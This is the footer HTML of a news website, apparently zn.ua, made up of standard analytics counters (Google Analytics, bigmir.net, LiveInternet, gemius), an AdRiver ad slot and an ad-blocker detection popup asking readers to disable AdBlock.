   <script type="text/javascript">
    var _gaq = _gaq || [];
    _gaq.push(['_setAccount', 'UA-3006560-7']);
    _gaq.push(['_setDomainName', 'zn.ua']);
    _gaq.push(['_trackPageview']);
    (function() {
      var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
      ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
      var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
    })();
  </script>
  <!-- Google Analytics [END]-->

    <!--bigmir)net TOP 100-->
    <script type="text/javascript" language="javascript"><!--
    bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:3250,s:3250,t:33,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
    for(f=self;f!=f.parent;f=f.parent)bm.w++;
    try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|s)+/,''));
    else for(f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
    try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
    try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
    r=bmD.referrer.slice(7);if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r);bm.v^=r.length}
    bm.v^=window.location.href.length;for(x in bm)bs[i++]=x+bm[x];
    bmD.write('<a href="//www.bigmir.net/" target="_blank" onClick="img=new Image();img.src=&quot;//www.bigmir.net/?cl=3250&quot;;"><img src="//c.bigmir.net/?'+bs.join('&')+'"  width="160" height="19" border="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a>');
    //-->
    </script>
    <!--bigmir)net TOP 100-->

    <!--LiveInternet counter-->
    <script type="text/javascript"><!--
    document.write("<a href='//www.liveinternet.ru/click' "+
    "target=_blank><img src='//counter.yadro.ru/hit?t39.6;r"+
    escape(document.referrer)+((typeof(screen)=="undefined")?"":
    ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
      screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
      ";"+Math.random()+
      "' alt='' title='LiveInternet' "+
      "border='0' width='31' height='31'><\/a>")
      //--></script>
    <!--/LiveInternet-->

  </div>
  <div class='clear'></div>

</div>
<!—  AdRiver code START. Type:AjaxJS Site: ZN BN:4 —>
<div id="adriver_banner_1454520882"></div>
<script type="text/javascript">
new adriver("adriver_banner_1454520882", {sid:161943, bt:52, bn:4});
</script>
<!—  AdRiver code END  —>
      </div>
      <!--#footer [END]-->

    <!--detect AD_block [START]-->
    <!-- The Modal -->
    <div id="myModal" class="modal">
      <!-- Modal content -->
      <div class="modal-content">
        <span class="close">&times;</span>
        <p>За нами нет олигархов.</p>
        <p>Мы выживаем за счет рекламы.</p>
        <p>Отключите AdBlock</p>
      </div>
    </div>

    <script src="/static/js/ads.js" type="text/javascript"></script>
    <script type="text/javascript">
      var modal = document.getElementById('myModal');
      var span = document.getElementsByClassName("close")[0];
//      $(document).ready(function() {
        if(!document.getElementById('g74jH6y7')){
          modal.style.display = "block";
        }
        span.onclick = function() {
          modal.style.display = "none";
        }
        window.onclick = function(event) {
          if (event.target == modal) {
            modal.style.display = "none";
          }
        }
//      });
      </script>
    <!--detect AD_block [END]-->

  

<script language="JavaScript" type="text/javascript" src="/static/js/xgemius.js"></script>
<script type='text/javascript'>document.write('<img src="//zn.ua/svc/stat/?svc_1='+R_ID+'&svc_2='+S_ID+'&svc_3='+A_ID+'&ac='+Math.random()+'" border="0" width="1" height="1" style="width:0; height:0;" />');</script>
</body>

</html>